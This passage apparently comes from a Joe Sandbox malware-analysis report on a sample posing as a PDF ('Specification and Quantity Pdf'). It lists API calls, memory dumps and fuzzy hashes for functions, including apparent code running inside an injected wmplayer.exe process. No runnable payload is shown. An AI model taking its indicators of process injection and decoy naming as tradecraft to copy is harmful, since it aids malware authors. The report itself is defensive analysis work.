_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,HeapVerify,00007FF773C5C313,?,?,?,00007FF773C62967,?,?,?,?,00007FF773C5B845), ref: 00007FF773C5D08B
strtoull.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,HeapVerify,00007FF773C5C313,?,?,?,00007FF773C62967,?,?,?,?,00007FF773C5B845), ref: 00007FF773C5D0C8

Strings

HeapVerify, xrefs: 00007FF773C5D05F

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: _stricmpstrtoull
String ID: HeapVerify
API String ID: 4031153986-2674988305
Opcode ID: 3a336707b4a45596346e9791d434987ae1de577f78f4eb99a8291cf3e8841bd7
Instruction ID: 79a591e5c665b53a7b796d57d89c3fd90fa47b0ff2a3a73249c59da8cd548b9a
Opcode Fuzzy Hash: 3a336707b4a45596346e9791d434987ae1de577f78f4eb99a8291cf3e8841bd7
Instruction Fuzzy Hash: 06018033A39A4589E791BF11E880079F3A0FB987C0F999072DA9D13A49DF3CD4828610

Function 00007FF773C83260 Relevance: 5.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,00000003,00007FF773C6D6BF,01FFF001,00000000,00000000,00007FF773C7BD4F), ref: 00007FF773C832ED
LeaveCriticalSection.KERNEL32(?,?,?,?,00000003,00007FF773C6D6BF,01FFF001,00000000,00000000,00007FF773C7BD4F), ref: 00007FF773C8333E
EnterCriticalSection.KERNEL32(?,?,?,?,00000003,00007FF773C6D6BF,01FFF001,00000000,00000000,00007FF773C7BD4F), ref: 00007FF773C83374
LeaveCriticalSection.KERNEL32(?,?,?,?,00000003,00007FF773C6D6BF,01FFF001,00000000,00000000,00007FF773C7BD4F), ref: 00007FF773C8338F

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: e743cea26d5aa4e05b231aa46b4469101279d7ee653fa58b53f11e4b04d877f5
Instruction ID: a5dad76e86bec13ebaebeb0fac877af5c57d9f02006c077d7a7a714802215aaa
Opcode Fuzzy Hash: e743cea26d5aa4e05b231aa46b4469101279d7ee653fa58b53f11e4b04d877f5
Instruction Fuzzy Hash: E8418027A3C64281EA90AF61E4503B5F350EB45794F980232DD9D67AD5CF3DF2558360

Function 00007FF773C74020 Relevance: 5.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000000,00007FF773C7419F,?,?,?,00007FF773C81E7B), ref: 00007FF773C7406A
LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF773C7419F,?,?,?,00007FF773C81E7B), ref: 00007FF773C740AC
EnterCriticalSection.KERNEL32(?,?,00000000,00007FF773C7419F,?,?,?,00007FF773C81E7B), ref: 00007FF773C740D7
LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF773C7419F,?,?,?,00007FF773C81E7B), ref: 00007FF773C740F8

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: fad017503d982359f6b350fff991fd565ce6d91fee4a39b5e2a1188cb59f1a07
Instruction ID: c13685da94ac064b601b6b4a00d687cdf3b99873ac190f32b0b06a94e36cbaee
Opcode Fuzzy Hash: fad017503d982359f6b350fff991fd565ce6d91fee4a39b5e2a1188cb59f1a07
Instruction Fuzzy Hash: F3212C23E7C90681EAD0AB64E8903B4B354EF107A4FD80332C56DA75E5DF6CE1A5C3A1

Analysis Process: wmplayer.exePID: 7956, Parent PID: 7692COMMON

Execution Graph

Execution Coverage:	1.8%
Dynamic/Decrypted Code Coverage:	5.4%
Signature Coverage:	8%
Total number of Nodes:	577
Total number of Limit Nodes:	70

Executed Functions

Function 03B5A036 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 481
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryInformationProcess.NTDLL ref: 03B5A19F

Strings

0, xrefs: 03B5A227

Memory Dump Source

Source File: 00000006.00000002.1378179664.0000000003B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 03B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3b50000_wmplayer.jbxd

Similarity

API ID: InformationProcessQuery
String ID: 0
API String ID: 1778838933-4108050209
Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
Instruction ID: fe86786f4c5832d5b1a285b74f8fc25fdfde47cd1f2bdde7bdabb2d8f9f0dccb
Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
Instruction Fuzzy Hash: 20F11274518A4C8FDBA9EF68C894BEEB7E1FB98304F40466EE84ADB250DF349541CB41

Function 0041A3E0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A425

Strings

rMA, xrefs: 0041A402, 0041A410
rMA, xrefs: 0041A41D, 0041A424
1JA, xrefs: 0041A3FC, 0041A408

Memory Dump Source

Source File: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: 1JA$rMA$rMA
API String ID: 2738559852-782607585
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: c75c44bd16ed9a046d03b4490adc68ebadf214b0f3589fd2ba36fb57c0fad8bd
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 95F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4

Function 03B5A042 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 163
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryInformationProcess.NTDLL ref: 03B5A19F

Strings

0, xrefs: 03B5A0CD

Memory Dump Source

Source File: 00000006.00000002.1378179664.0000000003B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 03B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3b50000_wmplayer.jbxd

Similarity

API ID: InformationProcessQuery
String ID: 0
API String ID: 1778838933-4108050209
Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
Instruction ID: 24bf1bf6b5c27c49f61c9cf846298b5c733c67a4e3f4567ea584b8ef5eea10bb
Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
Instruction Fuzzy Hash: F2511C70914A8C8FDB69EF68C8946EEBBF4FB98305F40466EE84AD7250DF309645CB41

Function 0041A50B Relevance: 1.6, APIs: 1, Instructions: 56
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B104,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A549

Memory Dump Source

Source File: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 91f17fc03be1c6747b1fc9bee7c40ba965fbc622912273113a84b9d04876119d
Instruction ID: 3b53d873a9165450f84cb1ae017c97b0e812d24917ad5496a9c091630dbac56c
Opcode Fuzzy Hash: 91f17fc03be1c6747b1fc9bee7c40ba965fbc622912273113a84b9d04876119d
Instruction Fuzzy Hash: DD011BB6211208ABCB14DF89DC81DEB73ADAF8C354F118249FE0997201C634F961CBB5

Function 0040ACF0 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62

Memory Dump Source

Source File: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: dc3a20c1ec50d06182a7a0d09a3226b614d41f62ab50fc3b2a934671b827885c
Instruction ID: 7435202e8c2424d374e436f157d00fb34b53d81c2f6da2748dfdf88e1812e125
Opcode Fuzzy Hash: dc3a20c1ec50d06182a7a0d09a3226b614d41f62ab50fc3b2a934671b827885c
Instruction Fuzzy Hash: C9015EB6D0020DBBDB10DBA1DC42FDEB3789F54308F0041AAA908A7281F634EB54CB95

Function 0041A32B Relevance: 1.5, APIs: 1, Instructions: 41
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A37D

Memory Dump Source

Source File: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: a686a4656c35774f8a8092ee5b481a9c1be533b027609282a4e80265cdab0862
Instruction ID: 9d0f9c1f54d28a393aa803b44fa7df7ada7850a5eacac906beb4a27e83d22564
Opcode Fuzzy Hash: a686a4656c35774f8a8092ee5b481a9c1be533b027609282a4e80265cdab0862
Instruction Fuzzy Hash: 5D01BDB2211108AFCB48CF99DD85EEB77A9AF8C754F158248FA1DD7240CA30E851CBA4

Function 0041A330 Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A37D

Memory Dump Source

Source File: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 7ed6e6cb708c972561b0f9910f559a39af1ab3cc862b6eef20835abd22e26781
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: C4F0BDB2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E851CBA4

Function 0041A510 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B104,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A549

Memory Dump Source

Source File: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 8b47746d7073478515a2f8fd1fb94e42dcc9ffa91ac9ff965dae3841ed3a313c
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 9CF015B2210208ABCB14DF89CC81EEB77ADAF88754F118149BE0897241C630F811CBA4

Function 0041A45A Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A485

Memory Dump Source

Source File: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: d411ce7cfc3c1acaf5d27afaf8a16f173a9a0c2da8ae514c80f19ff65f75a5ea
Instruction ID: b4f01c59d2f6d960dd549f2a89ac2df62a0c015f12d971f71681c95f20bdc505
Opcode Fuzzy Hash: d411ce7cfc3c1acaf5d27afaf8a16f173a9a0c2da8ae514c80f19ff65f75a5ea
Instruction Fuzzy Hash: 05E08C76241204AFD710EBE5CD86EEB7B68EF48320F00405AB918AB241C230E611CB90

Function 0041A460 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A485

Memory Dump Source

Source File: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: e9450f8bec15428cdd91297f97b7848412804bda5c7d31b3f0e5b01193c95e83
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 3CD01776211214ABD710EB99CC85EE77BACEF48764F15449ABA189B242C530FA1186E0

Function 03872BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03872BFA

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4c7312ddbb3afe5429c1155ced8956f1162fc0b6478b827c5c65c9913fb69af5
Instruction ID: 7eb52d04d60ca75482778d91298d49fd108de93608ceab9f92ba9fe99ba145e6
Opcode Fuzzy Hash: 4c7312ddbb3afe5429c1155ced8956f1162fc0b6478b827c5c65c9913fb69af5
Instruction Fuzzy Hash: FE90023120140C06D180B298444468A000687D1301FE5C055A1029658DCB158B5D77A2

Function 03872B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03872B6A

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c1e5b7597785240be0e9ec2235edd01c1abb81e717ad92d7f2c7ee12047d5502
Instruction ID: 66871c75473c08b40d51fe63dc972a439c0af9b2931c27f22c3969a41cc9069c
Opcode Fuzzy Hash: c1e5b7597785240be0e9ec2235edd01c1abb81e717ad92d7f2c7ee12047d5502
Instruction Fuzzy Hash: A7900261202404074105B2984454656400B87E0301BA5C061E2018594DC62589956126

Function 03872AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03872ADA

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9ebf286e65d6254d4643b7ad5fc3dd27d83fd5ab9063691c3b63abd3fd38549a
Instruction ID: 3e612b026a88bdadf96c965caab8a10e5884b125d13caf99908ce47cebabe6c2
Opcode Fuzzy Hash: 9ebf286e65d6254d4643b7ad5fc3dd27d83fd5ab9063691c3b63abd3fd38549a
Instruction Fuzzy Hash: CF900225211404070105F6980744547004787D53513A5C061F2019554CD72189655122

Function 03872F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03872F9A

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 99224844d09609cda847ec77872c587c77fb1478a8190df281f21249b47d4a8f
Instruction ID: 71d17e0d2903fbab4afcaf945aa91b5834b15ebe84d9840b995263593ae47f91
Opcode Fuzzy Hash: 99224844d09609cda847ec77872c587c77fb1478a8190df281f21249b47d4a8f
Instruction Fuzzy Hash: DE90023120180806D100B298485474B000687D0302FA5C051A2168559D872589556572

Function 03872FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03872FBA

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 072dc0de41f7c182bed604b821e4c6485131f31f0d2ee29dc696c32059f34826
Instruction ID: 1983b86864fdc9697310b1b4b75938a59cfe60ef6225062f04e6626637098400
Opcode Fuzzy Hash: 072dc0de41f7c182bed604b821e4c6485131f31f0d2ee29dc696c32059f34826
Instruction Fuzzy Hash: 34900221601404464140B2A888849464006ABE13117A5C161A199C554D865989695666

Function 03872FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03872FEA

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d534d4c1d5ef82fc4430989d261844d9d939af3452edde1cec066700daabb25c
Instruction ID: 06a82161c8354bf48f8a640caecd29b186795f737c55a36de0b728ea611bfb51
Opcode Fuzzy Hash: d534d4c1d5ef82fc4430989d261844d9d939af3452edde1cec066700daabb25c
Instruction Fuzzy Hash: 8E900221211C0446D200B6A84C54B47000687D0303FA5C155A1158558CCA1589655522

Function 03872F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03872F3A

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5088da80c10d95947347ba15a4762e26c670219591d5999ed924af9f1e940cc5
Instruction ID: 244c40a51976ae1ed193d35ec2f1ca08503bd4a18e9eed2f49205e8685346ae7
Opcode Fuzzy Hash: 5088da80c10d95947347ba15a4762e26c670219591d5999ed924af9f1e940cc5
Instruction Fuzzy Hash: 1890026134140846D100B2984454B460006C7E1301FA5C055E2068558D8719CD566127

Function 03872E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03872E8A

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 341add43e8630aea0561152d639781153617f2f76261bf314d9d75670fde8c04
Instruction ID: cfd5cf455fc320a9792499c68348bcdd9cc08754e4fae1bc4804885e1d4af621
Opcode Fuzzy Hash: 341add43e8630aea0561152d639781153617f2f76261bf314d9d75670fde8c04
Instruction Fuzzy Hash: 8790022160140906D101B2984444656000B87D0341FE5C062A2028559ECB258A96A132

Function 03872EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03872EAA

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7c018e5b7222a37e91feaa5a7577432ea530415ac341188d51a1172e8ba561cb
Instruction ID: cd65a714a82f43856e199d71a65957981f1eadf78cd555ea4db75f261dd8fc35
Opcode Fuzzy Hash: 7c018e5b7222a37e91feaa5a7577432ea530415ac341188d51a1172e8ba561cb
Instruction Fuzzy Hash: A090027120140806D140B2984444786000687D0301FA5C051A6068558E87598ED96666

Function 03872DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03872DDA

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4b4fb39955c1cdec55061755ad517508a3f776cc56bf3a800a3dece65af5e88a
Instruction ID: de6efbafae872ce13a6d9fceaed45a35838300e8da87186796d146a0d8585e5b
Opcode Fuzzy Hash: 4b4fb39955c1cdec55061755ad517508a3f776cc56bf3a800a3dece65af5e88a
Instruction Fuzzy Hash: BD900221242445565545F2984444547400797E03417E5C052A2418954C8626995AD622

Function 03872DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03872DFA

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
